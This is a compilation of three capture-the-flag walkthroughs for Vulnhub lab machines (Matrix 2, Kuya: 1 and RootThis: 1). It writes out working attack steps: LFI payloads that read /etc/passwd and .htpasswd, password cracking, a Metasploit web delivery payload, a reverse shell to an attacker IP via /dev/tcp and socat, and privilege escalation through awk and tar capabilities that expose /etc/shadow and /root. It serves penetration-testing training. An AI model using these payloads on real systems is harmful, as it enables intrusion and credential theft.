Matrix 2: Vulnhub Lab Walkthrough

Today we are going to solve another Boot2Root challenge “Matrix 2”. It is another vulnerable lab presented by vulnhub for helping pentester’s to perform penetration testing according to their experience level.

Difficulty: Intermediate

Penetrating Methodologies:

·         Network scanning (Nmap)

·         Surfing HTTP service port (80)

·         Surfing HTTPS service port (1337)

·         Surfing HTTPS service port (12320)

·         Surfing HTTPS service port (12322)

·         Browsing Directories on the browser

·         Discovering LFI vulnerability.

·         Enumerating through /etc/passwd file.

·         Enumerating through /var/www/p4ss/.htapasswd file.

·         Cracking password hash.

·         Using Credentials to log into port 1337.

·         Viewing Page source of Webpage.

·         Find Hidden file using steghide.

·         Using Credentials to log into port 12320.

·         Creating Python exploit using Metasploit.

·         Getting root access.

·         Snagging the Root flag.

Walkthrough

Let’s start off with scanning the network to find our target.

nmap -p- -A 192.168.1.101

From nmap result, we observed that on multiple ports there is HTTPS service running except on port 80. We thought of exploring all the ports along with targets IP Address on the browser. Lets see what clue we get to move ahead.

Firstly, we explored the Targets IP address on port 80 on the browser. It was not much of great help.

Secondly, we explored the Targets IP Address on port 1337 on the browser. Here we noticed it required authentication but we dont know that. Moving on.

Thirdly, we explored the Targets IP Address over port 12320 on the browser. We noticed that it showed us a command shell which again is not much of a great help. Moving Forward.

Fourthly, we explored the Targets IP Address over port 12322 on the browser. The webpage opened didnt came out to be much useful. But what draw our attention is that we noticed two disallowed entry on port 12322 in the namp scan result. On exploring the first entry robots.txt, we found another disallowed entry i.e file_view.php.

When we explored the entry file_view.php along with Targets IP Address, it opened a blank webpage which made us curious about it. So, when we checked the View Page Source, there we saw the page is sending a GET Request. After spending some time thinking, we decided to use curl for exploiting LFI vulnerability for obtaining /etc/passwd file. Here we saw two credentials n30 and Neo, they might come in handy.

curl -X POST –k https://192.168.1.101:12322/file_view.php -d “file=../../../../../etc/passwd”

Here, we found another directory /var/www/p4ss/.htpasswd which might be useful.

curl -X POST -k https://192.168.1.101:12322/file_view.php -d "file=../../../../../etc/nginx/sites-available/default"

After getting another directory, We used curl to exploit LFI vulnerability to obtain the contents of /var/www/p4ss/.htapasswd by using command.

Curl –X POST –k https://192.168.1.101:12322/file_view.php -d “file=../../../../../var/www/p4ss/.htapasswd”

This result gave us a HASH. Time to bring john up.

We have used john to crack the hash.

john hash -wordlist=/usr/share/wordlists/rockyou.txt

It gave us a Username and Password i.e admin & Tr1n17y

Let’s use these credentials to log into port 1337 along with Targets IP Address on the browser.

The webpage showed a name n30 which can be used as a credential later on. On exploring the View Page Source of the webpage showed us a hidden image h1dd3n.jpg.

When opening the image h1dd3n.jpg on the browser. The result is shown in the image below.

We have used a tool called “steghide” to find if there is any file hidden inside the image and find a hidden text file called “n30.txt”. We extract the file and opened it which gave us a password i.e P4$$w0rd.

Let’s login to port 12320 using targets IP Address by using Credentials as.

Username - n30

Password – P4$$w0rd

After making sure python is running on the machine. We have created a python exploit using Metasploit.

use exploit/multi/script/web_delivery

set lhost 192.168.1.107

set srvhost 192.168.1.107

exploit

Let’s copy the command created and paste it on the target machine.

Let’s copy the command created and paste it on the target machine.

After obtaining meterpreter, we have explored the directories. Here we found a file .bash_history which contains some commands. These commands can be useful to get root access, lets save them for later use.

ls

cat .bash_histroy

Let’s get back to the meterpreter and use the command we have obtained earlier.

Booyeah!! We have got the root access. Time to read the flag.

shell

id

morpheus ‘BEGIN {system(“/bin/sh”)}’

id

cd /root

ls

cat flag.txt

Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

Vulnhub: Kuya: 1 Walkthrough

Today we are going to solve another CTF challenge “Kuya”. It is another vulnerable lab presented by vulnhub for helping pentester’s to perform penetration testing according to their experience level.

Level: medium

Task: to find three flags hidden in the whole application

Penetrating Methodology

·        Machine discovery and scanning(netdiscover, nmap)

·        Surfing HTTP service port(80)

·        Directory enumeration using dirbuster

·        Extract stegnographic content using steghide

·        Extract file from pcapng file using wireshark

·        Extract and decrypt hashes using john the ripper

·        Check contents of system-wide configuration files for credentials

·        Privilege escalation using tar

Let’s start off with discovering the IP address of our vm

netdiscover

Then we'll continue with our basic Nmap command to find out the open ports and services. Here we'll find port 22 and 80 open.

nmap -p- -A 192.168.0.16

Once we get the idea of existence of a web-application, we'll browse it on browser

We'll use dirbuster to brute force the directories of the web-application.

We'll browse the directories one-by-one only to find that “loot” is the only helpful directory

We’ll download all the images and use steghide to discover the hidden content beneath the images.

steghide extract -sf 1.jpg

steghide extract -sf 2.jpg

steghide extract -sf 3.jpg

steghide extract -sf 4.jpg

steghide extract -sf image.jpeg

Now, we’ll try to read the files, “secret.txt” there contained a base64 encoded string. Once decoded, it would give a string, not very useful.

cat secret.txt

We'll check the emb.txt, we get the brainfuck encrypted text

cat emb.txt

Once decrypted, the brainfuck encryption gave us the result and our first flag

We’ll open the “loot.pcapng” file with wireshark to check the communication and there we found the record of GET and POST request for downloading a file along with the file byte in the 11^th packet. Once selecting the packet we’ll go to File > Export Objects > HTTP and then save the 7z file.

When we tried to open and extract the file contents, it asked for password so we’ll use 7z2john.pl to get the hash value from the 7z file and use john the ripper to crack it using the rockyou.txt wordlist. Here, we get the password “manchester” for the 7z file.

./7z2john.pl loot.7z > 7zhash

john 7zhash -wordlist:/usr/share/wordlists/rockyou.txt

We’ll again try to extract the contents of the 7z file, providing the password we found out about the two key files found

Again, we move back to john the ripper, this time we’ll use ssh2john.py script to get the hash value from the id_rsa file, then we’ll use john to crack the hash using rockyou.txt as wordlist. The password decrypted as “hello”

python ssh2john.py id_rsa > id_rsa.hash

john id_rsa.hash --wordlist:/usr/share/wordlists/rockyou.txt

Then we wanted to know the username so we head towards id_rsa.pub to check the contents and discover the username in the end of the file. The username came out as “test”.

cat id_rsa.pub

Now we have the username and the private key along with the password, let’s try to connect to SSH

ssh -i id_rsa test@192.168.0.16

After getting a shell, first we’ll check the files, in the .ssh directory, we will find a sshscript.sh file having our second flag.

Then we’ll move to /var/www/html /wordpress directory to look out for configuration files and we found a file wp-config-sample.php

cd .ssh

ls -la

cat sshscript.sh

cd /var/www/html/wordpress

ls –al

Use more command along with cat to display the complete contents of the config file.

cat wp-config-sample.php |more

Once we get the credentials, use su to switch to new user, now we tried to find files with sudo permissions, but no luck so we switch to home directory of the new user and check the files. Here we have a hidden file with bash history named .bash_history having some useful information. It provides us with the details about the use of getcap and setcap commands.

su kuya

find / -perm -4000 2>/dev/null

cd

ls

cat who_dis.txt

cat .bash_history

In linux, files can be provided with a capability to access specific files majorly critical files with specific permissions only; like a script file can be provided with the capability to read ssh configuration files or /etc/shadow file which can be done using getcap and setcap commands. For more information about this, look here(https://linux.die.net/man/7/capabilities)

In linux, tar has the specific permission to read all files so here we will create a tar file of /etc/shadow and then extract that tar file to display the contents of the newly extracted copy of the original shadow file.

export PATH=/bin:/sbin:/usr/bin:/usr/sbin:$PATH

getcap -r / 2>/dev/null

tar -cvf shadow.tar "/etc/shadow"

tar -xvf shadow.tar

cat etc/shadow

As we can open extract and archive files that need root permission. We can use “tar” command to archive the entire “/root” directory as shadow.tar inside user kuya’s home directory. We then extract “shadow.tar” using tar command and are able to get the root directory. We go to the extracted root directory and find a file called “M3m3L0rd.txt”. We open the file and find the final flag.

tar cvf shadow.tar /root

tar xvf shadow.tar

cd root/

cat M3m3L0rd.txt

Vulnhub: RootThis: 1 Walkthrough

Hello friends! Today we are going to take another boot2root challenge known as RootThis. The credit for making this VM machine goes to “Fred Wemeijer” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM here.

Security Level: Intermediate

Flags: There is one flag (flag.txt).

Penetrating Methodology:

·        IP Discovery using netdiscover
·        Network scanning (Nmap)
·        Surfing HTTP service port (80)
·        Directory enumeration using dirb
·        Getting Backup file using wget
·        Cracking password using fcrackzip
·        Cracking Hashes using John the Ripper
·        Getting Reverse Shell
·        Getting a proper TTY shell using socat
·        Cracking root password using sucrack
·        Retrieving flag

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

We found our target –> 192.168.1.135

Our next step is to scan our target with nmap.

nmap -p- -A 192.168.1.135

The NMAP output shows us that there is only 1 port open: 80(HTTP). We find that port 80 is running http, so we open the IP in our browser.

We don’t find anything on the webpage, so we use dirb to enumerate the directories on the web server.

dirb http://192.168.1.135/

We find two interesting directories called “backup” and “drupal”. We open the “/drupal” directory and find a Drupal CMS login page. We are unable to login or find any vulnerability on the CMS.

We try to open “backup/” directory and find that it is a file. So we use “wget” to download the file on our system. After downloading the file, we find that is a ZIP file. When we tried to extract it we are prompted for a password. To brute force the password protected file we can use a tool called “fcrackzip”. After getting the password for the ZIP file we extract the data and find a SQL file.

wget http://192.168.1.135/backup

file backup

frackzip -D -v -u -p /usr/share/wordlists/rockyou.txt backup

unzip backup

cat dump.sql

Searching through content of the SQL file, we find 2 usernames and their password hashes.

We save the hashes in a file and then use john the ripper to crack the hashes. We are successfully able to crack the hash and get the password for the user “webman”.

john hashes --wordlist=/usr/share/wordlists/rockyou.txt

We use the credentials “webman: moranguita” to login through Drupal CMS and are successfully able to login.

To get a reverse shell of the target system, we go to add content and add the following php code to get a revere shell:

& /dev/tcp/192.168.1.107/1234 0>&1'");

We setup our listener and as soon as we click on save on the CMS we get a reverse shell. Enumerating the target system; inside “/home/user” directory we find a file called “MessageToRoot.txt”. We open the file and find it has hint that the root password is inside the first 300 words of the rockyou.txt. We try to “su” command and find that we don’t have a proper TTY shell to run the command.

We tried multiple ways to get a TTY shell, but are unable to spawn one with available application on the target machine. So we upload socat on the target machine to get a TTY shell. (Download socat from here)

wget http://192.168.1.107/socat

./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.107:4567

We start a listener on our local system, and are able to get a reverse shell. We run “su” command and find that we are able to spawn a TTY shell.

Now we create a dictionary with the first 300 words of rockyou.txt.

head -n 300 /usr/share/wordlists/rockyou.txt > dict.txt

Now as there is SSH running on the target machine, we cannot brute force the username and password. Instead we can use a tool called “sucrack” that brute forces password locally through “su”. We download it in our system and extract it. Then we compile the application on our system as there is not C-compiler on the target machine. After compiling the application, we archive the compiled application to upload it on the target machine. (You can find more information about sucrack and download sucrack from here)

tar -xvf sucrack-1.2.3.tar.gz

cd sucrack-1.2.3/

./configure

make

tar -cvf sucrack.tar sucrack-1.2.3/

We upload the dictionary file and the compiled application on the target system. We first start our python HTTP server using “SimpleHTTPServer” module and then use “wget” command on the target machine to download it from our local system. After downloading both the files we extracted the tar file.

wget http://192.168.1.107/sucrack.tar

tar xvf sucrack.tar

After extracting the tar file, we go to “sucrack1-2.3/src” directory as the compiled application is inside this directory and run the command to brute force the password. The application was successfully able to brute force the password for root user. We switched to root user and inside /root directory and we successfully able to get the flag.

./sucrack -u root -w 10 /tmp/dict.txt